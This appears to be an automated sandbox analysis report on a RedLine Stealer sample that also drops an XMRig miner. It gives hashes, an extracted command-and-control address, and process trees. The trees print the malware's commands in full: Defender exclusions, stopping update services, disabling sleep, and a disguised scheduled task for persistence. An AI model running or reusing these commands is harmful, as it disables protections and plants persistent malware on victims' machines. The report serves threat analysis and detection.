Analysis
-
max time kernel
135s -
max time network
143s -
platform
windows7_x64 -
resource
win7-20230712-en -
resource tags
arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system -
submitted
08-08-2023 06:20
Behavioral task
behavioral1
Sample
2588-61-0x0000000003E70000-0x0000000003EA4000-memory.exe
Resource
win7-20230712-en
Behavioral task
behavioral2
Sample
2588-61-0x0000000003E70000-0x0000000003EA4000-memory.exe
Resource
win10v2004-20230703-en
General
-
Target
2588-61-0x0000000003E70000-0x0000000003EA4000-memory.exe
-
Size
208KB
-
MD5
d5b12454c999ea8b174e094da3ad1caa
-
SHA1
78d6f1bcf392587d68b7eb1c0b8de4807e05c944
-
SHA256
9c7b4f71c5a32da120b8fc3ab5e29facb953196351e2f6f58cf5030f0aa09568
-
SHA512
a9a6e780629561bf921887bd5270f2d60fdfb5831abdec471bb0cd7dd9b563c9d041191f8490f33181ea702b6c05ca12df2c4e0b89a5d99bc3965ce66b8c042e
-
SSDEEP
3072:4eG4mt57f3YInEGK2U/YetUBaVa0b6AyM9w+Zxwak8e8hV:S4mt57gInEG3YetMb6
Malware Config
Extracted
redline
LogsDiller Cloud (TG: @logsdillabot)
209.250.248.11:33522
-
auth_value
3a050df92d0cf082b2cdaf87863616be
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs
description pid Process procid_target PID 1840 created 1288 1840 setup.exe 17 PID 1840 created 1288 1840 setup.exe 17 PID 1840 created 1288 1840 setup.exe 17 PID 1840 created 1288 1840 setup.exe 17 PID 1840 created 1288 1840 setup.exe 17 PID 1284 created 1288 1284 updater.exe 17 PID 1284 created 1288 1284 updater.exe 17 PID 1284 created 1288 1284 updater.exe 17 PID 1284 created 1288 1284 updater.exe 17 PID 1284 created 1288 1284 updater.exe 17 PID 1284 created 1288 1284 updater.exe 17 -
XMRig Miner payload 9 IoCs
resource yara_rule behavioral1/memory/1284-215-0x000000013F0D0000-0x00000001402F6000-memory.dmp xmrig behavioral1/memory/2816-219-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/2816-221-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/2816-223-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/2816-225-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/2816-227-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/2816-229-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/2816-231-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/2816-233-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig -
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
description ioc Process File created C:\Windows\System32\drivers\etc\hosts setup.exe File created C:\Windows\System32\drivers\etc\hosts updater.exe -
Stops running service(s) 3 TTPs
-
Executes dropped EXE 3 IoCs
pid Process 2720 mi.exe 1840 setup.exe 1284 updater.exe -
Loads dropped DLL 3 IoCs
pid Process 2600 2588-61-0x0000000003E70000-0x0000000003EA4000-memory.exe 2720 mi.exe 1984 taskeng.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/files/0x000e000000018fda-131.dat themida behavioral1/files/0x000e000000018fda-133.dat themida behavioral1/files/0x000e000000018fda-135.dat themida behavioral1/memory/2720-137-0x00000000044E0000-0x0000000005706000-memory.dmp themida behavioral1/memory/1840-136-0x000000013F680000-0x00000001408A6000-memory.dmp themida behavioral1/memory/1840-139-0x000000013F680000-0x00000001408A6000-memory.dmp themida behavioral1/memory/1840-140-0x000000013F680000-0x00000001408A6000-memory.dmp themida behavioral1/memory/1840-141-0x000000013F680000-0x00000001408A6000-memory.dmp themida behavioral1/memory/1840-142-0x000000013F680000-0x00000001408A6000-memory.dmp themida behavioral1/memory/1840-143-0x000000013F680000-0x00000001408A6000-memory.dmp themida behavioral1/memory/1840-145-0x000000013F680000-0x00000001408A6000-memory.dmp themida behavioral1/files/0x000e000000018fda-174.dat themida behavioral1/memory/1840-176-0x000000013F680000-0x00000001408A6000-memory.dmp themida behavioral1/files/0x0011000000018fe5-179.dat themida behavioral1/files/0x0011000000018fe5-181.dat themida behavioral1/memory/1984-182-0x000000013F0D0000-0x00000001402F6000-memory.dmp themida behavioral1/memory/1284-183-0x000000013F0D0000-0x00000001402F6000-memory.dmp themida behavioral1/memory/1284-185-0x000000013F0D0000-0x00000001402F6000-memory.dmp themida behavioral1/memory/1284-186-0x000000013F0D0000-0x00000001402F6000-memory.dmp themida behavioral1/memory/1284-187-0x000000013F0D0000-0x00000001402F6000-memory.dmp themida behavioral1/memory/1284-188-0x000000013F0D0000-0x00000001402F6000-memory.dmp themida behavioral1/memory/1284-189-0x000000013F0D0000-0x00000001402F6000-memory.dmp themida behavioral1/memory/1284-190-0x000000013F0D0000-0x00000001402F6000-memory.dmp themida behavioral1/memory/1284-191-0x000000013F0D0000-0x00000001402F6000-memory.dmp themida behavioral1/memory/1284-192-0x000000013F0D0000-0x00000001402F6000-memory.dmp themida behavioral1/memory/1284-201-0x000000013F0D0000-0x00000001402F6000-memory.dmp themida behavioral1/files/0x0011000000018fe5-213.dat themida behavioral1/memory/1284-215-0x000000013F0D0000-0x00000001402F6000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 1840 setup.exe 1284 updater.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 1284 set thread context of 2316 1284 updater.exe 73 PID 1284 set thread context of 2816 1284 updater.exe 74 -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files\Google\Chrome\updater.exe setup.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2992 sc.exe 2708 sc.exe 888 sc.exe 1700 sc.exe 1908 sc.exe 2124 sc.exe 1448 sc.exe 3020 sc.exe 2812 sc.exe 2472 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1252 schtasks.exe 1696 schtasks.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 707d338dc0c9d901 powershell.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 2588-61-0x0000000003E70000-0x0000000003EA4000-memory.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 2588-61-0x0000000003E70000-0x0000000003EA4000-memory.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 2588-61-0x0000000003E70000-0x0000000003EA4000-memory.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 2588-61-0x0000000003E70000-0x0000000003EA4000-memory.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 2588-61-0x0000000003E70000-0x0000000003EA4000-memory.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 2588-61-0x0000000003E70000-0x0000000003EA4000-memory.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2600 2588-61-0x0000000003E70000-0x0000000003EA4000-memory.exe 2600 2588-61-0x0000000003E70000-0x0000000003EA4000-memory.exe 2600 2588-61-0x0000000003E70000-0x0000000003EA4000-memory.exe 1840 setup.exe 1840 setup.exe 788 powershell.exe 1840 setup.exe 1840 setup.exe 1840 setup.exe 1840 setup.exe 1840 setup.exe 1840 setup.exe 1676 powershell.exe 1840 setup.exe 1840 setup.exe 1284 updater.exe 1284 updater.exe 3012 powershell.exe 1284 updater.exe 1284 updater.exe 1284 updater.exe 1284 updater.exe 1284 updater.exe 1284 updater.exe 1748 powershell.exe 1284 updater.exe 1284 updater.exe 1284 updater.exe 1284 updater.exe 2816 explorer.exe 2816 explorer.exe 2816 explorer.exe 2816 explorer.exe 2816 explorer.exe 2816 explorer.exe 2816 explorer.exe 2816 explorer.exe 2816 explorer.exe 2816 explorer.exe 2816 explorer.exe 2816 explorer.exe 2816 explorer.exe 2816 explorer.exe 2816 explorer.exe 2816 explorer.exe 2816 explorer.exe 2816 explorer.exe 2816 explorer.exe 2816 explorer.exe 2816 explorer.exe 2816 explorer.exe 2816 explorer.exe 2816 explorer.exe 2816 explorer.exe 2816 explorer.exe 2816 explorer.exe 2816 explorer.exe 2816 explorer.exe 2816 explorer.exe 2816 explorer.exe 2816 explorer.exe 2816 explorer.exe 2816 explorer.exe 2816 explorer.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 472 Process not Found -
Suspicious use of AdjustPrivilegeToken 14 IoCs
description pid Process Token: SeDebugPrivilege 2600 2588-61-0x0000000003E70000-0x0000000003EA4000-memory.exe Token: SeDebugPrivilege 788 powershell.exe Token: SeShutdownPrivilege 1584 powercfg.exe Token: SeShutdownPrivilege 960 powercfg.exe Token: SeDebugPrivilege 1676 powershell.exe Token: SeShutdownPrivilege 1812 powercfg.exe Token: SeShutdownPrivilege 1560 powercfg.exe Token: SeDebugPrivilege 3012 powershell.exe Token: SeShutdownPrivilege 2672 powercfg.exe Token: SeDebugPrivilege 1748 powershell.exe Token: SeShutdownPrivilege 2392 powercfg.exe Token: SeShutdownPrivilege 1476 powercfg.exe Token: SeShutdownPrivilege 1416 powercfg.exe Token: SeLockMemoryPrivilege 2816 explorer.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2600 wrote to memory of 2720 2600 2588-61-0x0000000003E70000-0x0000000003EA4000-memory.exe 31 PID 2600 wrote to memory of 2720 2600 2588-61-0x0000000003E70000-0x0000000003EA4000-memory.exe 31 PID 2600 wrote to memory of 2720 2600 2588-61-0x0000000003E70000-0x0000000003EA4000-memory.exe 31 PID 2600 wrote to memory of 2720 2600 2588-61-0x0000000003E70000-0x0000000003EA4000-memory.exe 31 PID 2720 wrote to memory of 1840 2720 mi.exe 32 PID 2720 wrote to memory of 1840 2720 mi.exe 32 PID 2720 wrote to memory of 1840 2720 mi.exe 32 PID 2720 wrote to memory of 1840 2720 mi.exe 32 PID 1228 wrote to memory of 1448 1228 cmd.exe 37 PID 1228 wrote to memory of 1448 1228 cmd.exe 37 PID 1228 wrote to memory of 1448 1228 cmd.exe 37 PID 1228 wrote to memory of 3020 1228 cmd.exe 38 PID 1228 wrote to memory of 3020 1228 cmd.exe 38 PID 1228 wrote to memory of 3020 1228 cmd.exe 38 PID 1228 wrote to memory of 2992 1228 cmd.exe 40 PID 1228 wrote to memory of 2992 1228 cmd.exe 40 PID 1228 wrote to memory of 2992 1228 cmd.exe 40 PID 1228 wrote to memory of 2812 1228 cmd.exe 39 PID 1228 wrote to memory of 2812 1228 cmd.exe 39 PID 1228 wrote to memory of 2812 1228 cmd.exe 39 PID 1228 wrote to memory of 2708 1228 cmd.exe 41 PID 1228 wrote to memory of 2708 1228 cmd.exe 41 PID 1228 wrote to memory of 2708 1228 cmd.exe 41 PID 3024 wrote to memory of 1584 3024 cmd.exe 46 PID 3024 wrote to memory of 1584 3024 cmd.exe 46 PID 3024 wrote to memory of 1584 3024 cmd.exe 46 PID 3024 wrote to memory of 960 3024 cmd.exe 47 PID 3024 wrote to memory of 960 3024 cmd.exe 47 PID 3024 wrote to memory of 960 3024 cmd.exe 47 PID 3024 wrote to memory of 1812 3024 cmd.exe 48 PID 3024 wrote to memory of 1812 3024 cmd.exe 48 PID 3024 wrote to memory of 1812 3024 cmd.exe 48 PID 3024 wrote to memory of 1560 3024 cmd.exe 49 PID 3024 wrote to memory of 1560 3024 cmd.exe 49 PID 3024 wrote to memory of 1560 3024 cmd.exe 49 PID 1676 wrote to memory of 1252 1676 powershell.exe 50 PID 1676 wrote to memory of 1252 1676 powershell.exe 50 PID 1676 wrote to memory of 1252 1676 powershell.exe 50 PID 1984 wrote to memory of 1284 1984 taskeng.exe 54 PID 1984 wrote to memory of 1284 1984 taskeng.exe 54 PID 1984 wrote to memory of 1284 1984 taskeng.exe 54 PID 1216 wrote to memory of 2472 1216 cmd.exe 59 PID 1216 wrote to memory of 2472 1216 cmd.exe 59 PID 1216 wrote to memory of 2472 1216 cmd.exe 59 PID 1216 wrote to memory of 888 1216 cmd.exe 60 PID 1216 wrote to memory of 888 1216 cmd.exe 60 PID 1216 wrote to memory of 888 1216 cmd.exe 60 PID 1216 wrote to memory of 1700 1216 cmd.exe 61 PID 1216 wrote to memory of 1700 1216 cmd.exe 61 PID 1216 wrote to memory of 1700 1216 cmd.exe 61 PID 1216 wrote to memory of 1908 1216 cmd.exe 62 PID 1216 wrote to memory of 1908 1216 cmd.exe 62 PID 1216 wrote to memory of 1908 1216 cmd.exe 62 PID 1216 wrote to memory of 2124 1216 cmd.exe 63 PID 1216 wrote to memory of 2124 1216 cmd.exe 63 PID 1216 wrote to memory of 2124 1216 cmd.exe 63 PID 2060 wrote to memory of 2672 2060 cmd.exe 68 PID 2060 wrote to memory of 2672 2060 cmd.exe 68 PID 2060 wrote to memory of 2672 2060 cmd.exe 68 PID 2060 wrote to memory of 2392 2060 cmd.exe 69 PID 2060 wrote to memory of 2392 2060 cmd.exe 69 PID 2060 wrote to memory of 2392 2060 cmd.exe 69 PID 2060 wrote to memory of 1476 2060 cmd.exe 70 PID 2060 wrote to memory of 1476 2060 cmd.exe 70
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1288
-
C:\Users\Admin\AppData\Local\Temp\2588-61-0x0000000003E70000-0x0000000003EA4000-memory.exe"C:\Users\Admin\AppData\Local\Temp\2588-61-0x0000000003E70000-0x0000000003EA4000-memory.exe"2⤵
- Loads dropped DLL
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2600 -
C:\Users\Admin\AppData\Local\Temp\mi.exe"C:\Users\Admin\AppData\Local\Temp\mi.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2720 -
C:\Windows\Temp\setup.exe"C:\Windows\Temp\setup.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:1840
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:788
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
PID:1228 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:1448
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:3020
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:2812
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:2992
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:2708
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:3024 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1584
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:960
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1812
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1560
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#syxapd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
